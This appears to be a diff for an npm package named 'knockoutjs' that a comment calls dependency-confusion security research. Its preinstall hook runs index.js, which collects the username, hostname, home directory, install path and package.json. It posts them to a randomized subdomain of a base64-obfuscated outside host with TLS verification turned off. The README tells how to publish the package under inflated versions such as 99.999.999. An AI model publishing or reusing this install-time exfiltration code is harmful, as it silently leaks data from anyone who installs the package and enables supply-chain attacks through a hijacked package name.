knockoutjs 3.5.99

package/README.md

@@ -0,0 +1,25 @@
+## Prepare for publishing
+
+* Change the `name` and `author` of the package in `package.json`.
+* Change email in `index.js:1` and `author` in `package.json`
+
+## Publish to npmjs.com
+Login to npm and then publish the package:
+```
+npm login
+npm publish --access public
+```
+(--access public only really needed for scoped packages, as they are private by default)
+
+Modify the version in `package.json`, and push new version:
+```
+npm publish
+```
+
+Typical versions you want to publish:
+
+```
+* 0.0.999
+* 0.999.999
+* 99.999.999
+```

package/index.js

@@ -0,0 +1,38 @@
+// non-malicious security research. Contact: webhak@forenk.uk
+const os = require("os")
+const http = require("https")
+const packageJson = require("./package.json")
+const pkgName = packageJson.name
+
+const genRanHex = size => [...Array(size)].map(() => Math.floor(Math.random() * 16).toString(16)).join('')
+
+const postData = JSON.stringify({
+    pkg: pkgName,
+    pkgjson: packageJson,
+    dir: __dirname,
+    home: os.homedir(),
+    host: os.hostname(),
+    username: os.userInfo().username, 
+})
+
+var options = {
+    hostname: `${genRanHex(6)}.${pkgName}.${Buffer.from('aDR4Lm5pbmph', 'base64')}`,
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(postData)
+      }
+}
+
+process.env["NODE_TLS_REJECT_UNAUTHORIZED"] = 0;
+
+var req = http.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    })
+})
+
+req.write(postData)
+req.end()

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "knockoutjs",
+  "version": "3.5.99",
+  "description": "Proof of Concept package for Dependency Confusion security issues.",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js"
+  },
+  "author": "webhak@forenk.uk",
+  "license": "MIT"
+}